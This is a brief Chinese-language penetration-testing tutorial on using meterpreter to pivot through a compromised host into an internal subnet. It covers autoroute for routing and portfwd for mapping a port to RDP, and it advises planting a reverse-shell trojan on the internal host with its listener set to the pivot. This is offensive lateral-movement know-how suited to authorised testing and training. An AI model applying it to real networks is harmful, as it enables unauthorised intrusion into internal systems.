meterpreter跳板机
背景:渗透测试者A拿到了B主机的控制权,但没有拿到ssh密码(不能打ssh隧道)。现需横向移动渗透内网主机C,为了避免动作过大不便直接在B上对C进行渗透,其中C不能出公网。现需让B转发A到C的流量,并最终使C反弹shell至A。
方案:使用meterpreter来“打路由”或者做端口映射两种方案
工作原理:
打路由:在A与B的session中增加一条目的为192.168.1.0/24,下一跳为该sessionID的路由
端口映射:在A本地侦听一个空闲端口,通过A与B的session与C指定端口做映射
操作步骤:
一、打路由:
meterpreter > run autoroute -s 192.168.1.0/24 ====>添加到目标内网路由
meterpreter > run autoroute -p ===>查看路由是否添加成功
此时使用msf框架内的扫描模块即可扫描192.168.1.2
1、在C中植入反弹木马时应设置lhost为192.168.1.1 ====>重要!!!B上的meterpreter会自动在192.168.1.1开启相应侦听端口,并将收到的流量转发至A
2、此方法的优点是足够灵活,写一条路由就可以到整个网段的全部端口了。缺点是只在MSF框架内有效,即:使用MSF内的工具可以访问到192.168.1.2,使用MSF外的工具就访问不到192.168.1.2了
二、端口映射:
meterpreter > portfwd add -L 100.1.1.1 -l 4444 -r 192.168.1.2 -p 3389
-L 在本地哪个IP上侦听端口
-l 在本地哪个端口上做映射
-r 映射至哪台目标设备
-p 映射至目标设备具体哪个端口
注意:此方式缺点是只能一对一做映射,不够灵活。但优点是基于操作系统层面做的端口映射,即:使用MSF外的工具访问4444也能映射至目标设备的3389